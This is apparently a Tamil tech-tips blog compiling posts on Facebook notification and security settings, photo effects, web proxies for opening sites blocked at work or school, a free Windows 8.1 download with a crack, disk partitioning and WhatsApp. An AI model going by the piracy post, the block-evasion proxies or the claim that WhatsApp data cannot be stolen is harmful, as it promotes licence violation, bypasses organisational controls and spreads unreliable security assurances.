இன்றைய இணைய யுகத்தில் பேஸ்புக் பயன்படுத்ததாவர் எவருமே இருக்க மாட்டார். அதனால் நமக்கு சில பிரச்சினைகளும் உள்ளது. முக்கியமானது தேவை இல்லாமல் மின்னஞ்சல்கள் வருவது.அதை எப்படி தவிர்ப்பது என்று சொல்வதேஇந்தப் பதிவு. 




பேஸ்புக் மூலம் நமக்கு சில பிரச்சினைகளும் உள்ளன. அவற்றில் மிக முக்கியமானது நம் நண்பர்கள் நம் ஸ்டேட்டஸ் மீது ஒரு கிளிக் செய்தாலே நமக்கு மின்னஞ்சல் வருவது. இதை எப்படி தடுப்பது என்றுதான் இன்றைய பதிவு.முதலில் உங்கள் பேஸ்புக் கணக்கில் நுழையவும்.








மேலே உள்ளது போல பக்கத்தின் வலது பக்கம் Home என்பதற்கு அருகில் சொடுக்கவும் செய்து Account Settings செல்லவும். இதில் இடது புறம் Notifications என்பதை சொடுக்கவும்

இப்பொழுது, இதில் மேலே படத்தில் உள்ளதை போல Email Frequencyஎன்பதை சொடுக்கவும். இதன் மூலம் உங்களுக்கு ஒவ்வொரு முறையும் மின்னஞ்சல் வராது, மாறாக Photo Tag, Payment Confirmation, Security, and Privacy Notifications மற்றும் சில முக்கியமான செய்திகள் (இது நீங்கள் ரொம்ப நாளாக பேஸ்புக் பக்கம் வராவிட்டால் பிரபல செய்திகள், உங்கள் சுவற்றில்(Wall) நண்பர்கள் எழுதியது போன்றவை ஒரே மின்னஞ்சலில் வரும் ). 




எந்த மின்னஞ்சலும் வேண்டாம் என்பவர்களும் இதையே தெரிவு செய்து கொள்ளலாம். 




இல்லை எனக்கு சில விஷயங்கள் மின்னஞ்சலில் வர வேண்டும் என்று கேட்பவர்கள் இதனைசொடுக்கமல் விட்டு கீழே All Notifications என்ற பகுதியில் உங்களுக்கு தேவையான ஒன்றின் மீது (Photos, Pages இது போன்று ) கிளிக் செய்து தேவையான Notification தெரிவு செய்து Save செய்து விடுங்கள். இதன் மூலம் உங்கள் விருப்பமானவற்றை மட்டும் மின்னஞ்சலில் பெறலாம். 


சைட் டிஷ்: 


மிக முக்கிய காரியம் முடிந்து விட்டது இனி குட்டி தகவல்கள். 




Facebook அக்கவுண்ட் Email முகவரியை மாற்றுவது எப்படி? 


Facebook => Account Settings => Email இதில் உங்கள் Primary இமெயில் ஆக ஒன்றை தெரிவு செய்து கொள்ளலாம். ஏற்கனவே இருந்தால் ஒன்றை தெரிவு செய்து கொள்ளுங்கள், இல்லை புதியதாக ஒன்றை கொடுத்து (Add Another Email) Primary ஆக மாற்றிக் கொள்ளலாம். 


நமது பேஸ்புக் கணக்கை வேறு யாரேனும் பயன்படுத்துகிறாரா என்று அறிவது எப்படி?


Facebook => Account Settings => Security => Login Notifications இதை enable செய்யவும். இதன் மூலம் உங்கள் கணக்கில் நீங்கள் இதுவரை பயன்படுத்தாத கணினியில் இருந்து Log-in செய்தால் உங்களுக்கு மின்னஞ்சல் வந்துவிடும். (கவனிக்க. வேறு கணினி, உங்கள் கணினி அல்ல)


இதை Enable செய்த உடன் ஒருமுறை Log-அவுட் செய்து பின்னர் நுழையவும், அப்போது உங்கள் கணினிக்கு ஒரு பெயர் கேட்கும் கொடுத்து விடுங்கள். 

கடந்த நுழைவுகளை பார்ப்பது எப்படி? 

Facebook => Account Settings => Security => Active Sessions இதில் நீங்கள் உங்கள் கணக்கில் நுழைந்த வேறு வேறு இடம்/கணினி மூலம் நுழைந்து இருந்தால் அவற்றை காட்டும், எது வேண்டாமோ அல்லது சந்தேகமோ அதை End Activity கொடுத்து விடலாம். 


பேஸ்புக் App's களுக்கு கடவுச்சொல் வைப்பது எப்படி? 


சில பேஸ்புக் பயன்பாடுகள் (Applications) Secure ஆனது அல்ல. எனவே அவற்றுக்கு கடவுச்சொல் கொடுத்தால் நல்லது தானே. Facebook => Account Settings => Security => App Passwords இதில் பயன்பாட்டின் பெயரைக் கொடுத்து விட்டால் போதும்.


Facebook-ல் பகிரப்படும் படங்களுக்கு வண்ண "எபெக்ட்" கொடுக்க





எமது வாழ்வின் உன்னதமான தருணங்களை நண்பர்களுடன் பகிர்வதற்கு பிரபல சமூகத்தளமாக Facebook-ஐ பயன்படுத்துகின்றோம்.
இதன் மூலம் புகைப்படங்களையும் பகிர முடியும் என்பது அறிந்த விடயம். அதேபோல் அப்புகைப்படங்களுக்கு விதம் விதமான Effect வழங்கிய பின் நண்பர்களுடன் பகிர முடியும்.


இதற்காக பல இணையத்தளங்கள் உள்ளன. ஆனால் அது சற்று சிரமமான விடயமாகும். காரணம் பகிர வேண்டிய புகைப்படத்ததை குறித்த தளங்களுக்குUpload செய்து பின் Effect வழங்கியதை தொடர்நது Download செய்து மீண்டும் பேஸ்புக் தளத்தில் Upload செய்ய வேண்டும்.


இச்சிரமத்தை தவிர்த்து நேரடியாகவே பேஸ்புக்கில் Upload செய்யப்பட்டுள்ள புகைப்படங்களுக்கு Effect கொடுக்கும் வசதியை Mess My Photo என்ற இணையத்தளம் வழங்குகின்றது.
எவ்வாறு Effect கொடுப்பது என்று பார்ப்போம். 


1. இந்த இணைப்பில் அழுத்தி Mess My Photo தளத்திற்கு செல்லவும்.


2. தளத்திலுள்ள FB Select என்பதை அழுத்தவும்.




3. நீங்கள் முதல் தடவை இவ்வசதியை பயன்படுத்துவதனால் அனுமதி கேட்கும் எனவே Install என்பதை அழுத்தி, தொடர்ந்து Allow என்பதை அழுத்தவும்.






4. அடுத்தாக உங்கள் பேஸ்புக்கில் உள்ள எல்லா புகைப்படங்களும் காண்பிக்கும் ஒரு Window தோன்றும். அதில் நீங்கள் Effect கொடுக்க விரும்பும் படத்தை தேர்ந்தெடுக்கவும்.




click to select a photo 




5. தொடர்ந்து நீங்கள் விரும்பும் Effect ஒன்றை தேர்வு செய்துApply என்பதை அழுத்தவும்.






தற்போது இந்த புதிய படமானது உங்களது பேஸ்புக் கணக்கில் சேமிக்கப்பட்டிருக்கும். இனி அந்த படத்தை உங்கள் நண்பர்களுடன் பரிமாறலாம்.

Block செய்யப்பட்ட தளங்களை பார்ப்பது எப்படி..?



அலுவலகத்திலோ, பாடசாலையிலோ , பல்கலைக்கழகத்திலோ சில தளங்கள் Block செய்யப்பட்டு இருக்கலாம். அதில் சில பயன்படும் தளங்களும்வந்துவிடும். அம்மாதிரியான சமயங்களில் நம்மால் நமக்கு தேவையானதை உடனே தேட முடியாது அல்லது படிக்க முடியாது. அப்படி Block செய்யப்பட்ட தளங்களை எப்படி படிப்பது என்று பார்க்கலாம் ..

Block செய்யப்பட்ட தளங்களை Open செய்ய பல மென்பொருட்கள் இருந்தாலும் இலவசமாக வருவது இல்லை. ஆன்லைனில் நிறைய தளங்களில் இதை இலவசமாக செய்ய முடியும். அவற்றில் ஐந்தை பார்ப்போம்.

1. Hidexy -
அதிக விளம்பரங்கள் வந்தாலும் கொஞ்சம் வேகமாக Loade ஆகிறது. 


2. Hide IP Surfing - http://hideipsurfing.com/
விளம்பரங்கள் அதிகம் இல்லை என்றாலும் கொஞ்சம் மெதுவாக Loade ஆகிறது. இதை http://www.ezprxy.com/என்ற முகவரியிலும் பயன்படுத்த முடியும். 

3. Hide My IP Address - http://www.hidemyipaddress.org/
எல்லா தளங்களையும் ஓபன் செய்தாலும் மெதுவாக Loade ஆகிறது. 

4. Hide IP Free - http://hideipfree.com/
மேலே உள்ளது போலவே மெதுவாக ஓபன் ஆகிறது. சில widget- களை மறைத்து விடுகிறது. 

5. Hide My Ass - http://hidemyass.com/
இருக்கும் ஐந்தில் இது தான் மிக மெதுவாக தளங்களை திறக்கும். 

இந்த ஐந்தின் மூலமும் நிறைய தளங்களை திறக்க முடியும்.


Windows 8.1 பதிப்பை Crack உடன் இலவசமாக தரவிறக்கம் செய்ய.




ஆம் சகோதர்களே இன்று நாம் பார்க்கப் போவது Windows 8.1 பதிப்பை Crack உடன் இலவசமாக தரவிறக்கம் செய்வது எவ்வாறு என்று? அநேகமானோர் பயன்படுத்துவது விண்டோஸ் தான். Microsoft நிறுவனம் தனது 
பயனாளர்களுக்கு புதியதை அறிமுகப்படுத்திக் கொண்டே இருக்கு. அந்த வகையில் நாமும் Windows 8.1பதிப்பை Crack உடன் இலவசமாக Download செய்துகொள்வோம்.



Windows இனை பணம் கொடுத்து வாங்குவது என்றால் $119 கொடுத்து வாங்க வேண்டும். இது இலங்கை பணப்படி 15470 ஆகும். இவ்வளவும் பணம் கொடுத்து வாங்கும் அளவுக்கு எம்மைப்போன்ற சாதரனமானவர்களுக்கு கொஞ்சம் கடினம்தான். இருந்தாலும் நாம் இம்மென்பொருளை crack உடன் இலவசமாக தரவிறக்குவதால் இதனை இலகுவாக பயன்படுத்தலாம். நான் கீழே கொடுத்துள்ள Crack ஐ active செய்து கொள்ளுங்கள். அவ்வளவுதான்.




இது கீழேயுள்ள link இல் உங்களுக்கு விருப்பமானதை தரவிறக்கிக் கொள்ளுங்கள்.

Download: 




Download: 





இதோ கீழே Crack உள்ளது அதையும் தரவிறக்கிக் கொள்ளுங்கள்.

**********************************

**********************************


Windows 8.1 Activator 


**********************************************
**********************************************

மென்பொருள் இல்லாமல் Hard Disk ஐ Partition பிரிப்பது எப்படி?


கணனியை Format செய்யாமல் Partition களை உருவாக்குவது சாத்தியமா? சில சந்தர்ப்பங்களில் கணனி வன்தட்டில் மேலதிக பிரிவுகளை உருவாக்க வேண்டிய தேவை ஏற்படலாம். அவ்வாறான சந்தர்ப்பங்களில் நீங்கள் எந்த முடிவைஎடுப்பீர்கள்? Format செய்து பின் hard disk கினை தேவையானpartition களாக பிரிப்பது என்ற முடிவையே பலரும் எடுக்கின்றனர். நான் அதைபற்றி பகிர வரவில்லை.



இதற்க்கு வேறான மென்பொருட்களும் அவசியமில்லை. மேலும் அத்தியவசிய கோப்பிகள், உறைகளை வேறு இயக்கிகளுக்கு (separate drives) மாற்ற அல்லது பிரதி செய்து (copy) கொள்ள வேண்டிய அவசியமும் இல்லை.
கீழ் வரும் படிமுறைகளை பின்பற்றி புதிய Partition ஒன்றை SYSTEM DRIVE இல் உருவாக்கிக் கொள்ளலாம்.


1) முதலில் My Computer இல் Right click செய்து Manage என்பதை தெரிவு செய்யுங்கள் பின் Computer Management Windowதோன்றும்.


2) அதில் Storage சென்று Disk management என்பதை clickசெய்யுங்கள்.


3) அதில் வன்தட்டு , எனைய storage media க்களின் தகவல்கள் காண்பிக்கப்பட்டிருக்கும்.
இப்பொழுது உங்களுக்கு Partition செய்யவேண்டிய Disk Driveவினை தெரிவுசெய்யுங்கள்.


4) பின்னர் அதில் Right click செய்யது Shrink Volume என்பதை click செய்யுங்கள். அதன் பின்னர் windows தன்னியக்கமாக அந்த Partition இல் உள்ள free space ன் அளவை காட்டும்.


5) Shrink வின்டோவில் partition பிரிக்க தேவையான disk size வழங்குங்கள். இதன் போது hard disk கில் காட்டப்படும் free space இன் அளவினை பொருத்து தீர்மானிக்க.




6) பின்னர் shrink என்பதை click செய்யுங்கள் .சில வினாடிகளிலேயே புதிய Disk கோப்புகளுக்கு எதுவித பாதிப்புகளை ஏறப்படுத்தால் தோன்றும்.



7) புதிதாக உருவாக்கப்பட்ட Disk இன்னும் accessibleசெய்யப்படவில்லை.



8) இப்பொழுது unallocated drive இல் Right click செய்து New Simple Volume என்பதை தெரிவு செய்யுங்கள்.



9) Next பொத்தானை Click செய்க .இப்பொழுது Partition னுக்கு தேவையான size இனை வழங்குங்கள். (you can choose whole size right now).



10) Drive Letter இனை தெரிவு செய்த பின் Next பொத்தானை கிளிக் செய்யுங்கள்.



11) பின்னர் Format Settings இல் NTFS என்பதை File System பிரிவில் தெரிவு செய்யுங்கள். Allocation Unit Size பிரிவில் Default என்பதையும். Volume label இல் New Volume எனவே விட்டுவிடலாம். (தேவையானால் மாற்றிக்கொள்ளவும் முடியும்).




12) Perform a Quick Format என்பதை Check இசய்யது Nextபொத்தானை click செய்யுங்கள் .
புதிய வன்தட்டுப் பிரிவு தயாராகிவிட்டது. 

Ccleaner-ன் புதிய பதிப்பு அறிமுகம்.



கணனியை சுத்தம் செய்வதில் முக்கிய பங்கு வகிக்கும் Ccleaner-ன் புதிய பதிப்பு அறிமுகமாகி உள்ளது.

கணனியில் தங்கும் தேவையற்ற கோப்புகளை அழிப்பது, ரெஜிஸ்ட்ரியில் நீக்காமல் விடப்படும் குறியீடுகளை நீக்குவது, பயனற்ற குக்கீஸ் கோப்புகளை ஒழிப்பது போன்ற பல பணிகளுக்கு பெரும்பாலான நபர்கள் பயன்படுத்தும் மென்பொருள் தான் சிகிளீனர்.
இதன் புதிய பதிப்பு Ccleaner- v4.07.4369 அண்மையில் வெளியிடப்பட்டது.
இந்த பதிப்பு விண்டோஸ் 8.1 சிஸ்டத்தில் இணைந்து இயங்கும் வகையில் வடிவமைக்கப்பட்டுள்ளது.
பழைய விண்டோஸ் சிஸ்டத்தின் போல்டர்களை நீக்கும் திறன் வழங்கப்பட்டுள்ளது.
இன்டர்நெட் எக்ஸ்புளோரர் History Files-களை நீக்குவதில் புதிய முறை தரப்பட்டுள்ளது.
இதேபோல பல புதிய புரோகிராம்களுக்கான வசதிகளுடன், சில சிறிய தவறுகளும் சரி செய்யப்பட்டுள்ளதாக, இதனைத் தயாரித்து வழங்கும் பிரிபார்ம் நிறுவனம் அறிவித்துள்ளது.




அதிகமானோர் Whatsapp ஐ விரும்புவது ஏன்???

            


இன்று ஏன் இளைஞர்கள் சமூக இணையதளங்களுக்கு பதிலாக Whatsapp மற்றும் Wechat போன்ற வசதிகளை விரும்புகிறார்கள்? அதற்க்கு சில காரணங்கள் உள்ளது.

ஏனெனில் யாறும் இதில் ஏமாற்ற முடியாது அதுமட்டும் அல்லாமல் இந்த ஆப்ஸ்கள் பாதுகாப்பனதாகவு ம் உள்ளது.
பேஸ்புக்கில் யார் வேண்டுமென்றாலும் பொய்யான ஒரு அக்கவுன்ட்டை உருவாக்கி அதன் மூலம் மற்றவர்களை ஏமாற்ற முடியும் ஆனால் Whatsapp மற்றும் Wechat ல் அவ்வாறு செய்ய இயலாது.
இளைஞர்கள் சமூக இணையதளங்களுக்கு பதிலாக Whatsapp மற்றும் Wechat பயன்படுத்துவதற் கான 5 காரணங்களைக் கூறுகிறார்கள் அது என்னவென்று பார்ப்போமா..!
1) இந்த Whatsapp மற்றும் Wechat-ஐ பயன்படுத்துவதற்கான முக்கிய காரணம் உண்மையான நண்பர்கள் அதில் இருப்பார்கள்.
பேஸ்புக்கில் 1000 நண்பர்கள் இருப்பார்கள் ஆனால் அனைவரிடமும் தொடர்புக்கொள்ள முடியாது ஆனால் Whatsapp மற்றும் Wechatல் அனைவரிடமும் தொடர்புக்கொள்ள முடியாது.குருப் என்கிற அந்த ஆப்ஷனைப் பயன்படுத்தி நமக்கு நெருக்கமான நண்பர்களை சேர்த்து எப்பொழுது வேண்டுமானலும் தொடர்புக்கொள்ளலாம்.
2) பொய்யான நண்பர்களிடம் இருந்து பாதுகாக்கிறது Whatsapp மற்றும் Wechat பயனாபாடுகள் ஒரு நம்பகத்தன்மையை அளிக்கிறது. இதில் பொய்யான நண்பர்கள் அமைய வாய்ப்புகள் இல்லை. ஏனெனில் அனைத்து நண்பர்களின் தொடர்பு எண்கள் நமது மொபைலில் இருப்பாதால் இது பாதுகாப்பானதாக உள்ளது.
3) Whatsapp மற்றும் Wechat பயனாபாடுகள் பேஸ்புக்கைக் காட்டிலும் மிக விரைவாக செயல்படுகின்றன. பேஸ்புக்கில் செய்தியை அனுப்பிய பிறகு அது நண்பர்களை சென்று அடைந்ததா இல்லையா என்பது நமக்கு தெரியாது.ஆனால் Whatsapp மற்றும் Wechatல் மிக விரைவாகசெய்திகள் பரிமாறிக்கொள்ளப் படுகிறது.
4) Whatsapp மற்றும் Wechat பயன்பாடுகள் பேஸ்புக்கைக் காட்டிலும் மிகவும் பாதுகாப்பானது.பேஸ்புக்கில் நமது விஷயங்களை பகிரும்போது கவனமாக இருக்க வேண்டும். இல்லையெனில் நமது தகவல்களை தெரிந்து கொள்வார்கள் . Whatsapp மற்றும் Wechatல் ஏனெனில் இதில் யாரும் நமது தகவல்களை திருட முடியாது.
5)பேஸ்புக்கில் நமக்கு தெரியாமல் நமது பக்கத்தை யார் வேண்டுமானலும் பயன்படுத்திக்கொள்ள முடியும்.Whatsapp மற்றும் Wechatல் அவ்வாறு செய்ய இயலாது ஏனெனில் அனைத்து செய்திகளும் தனிப்பட்ட செய்திகளாக நமது போனிலே இருப்பதால் யாரும் இதனைத் திருட முடியாது.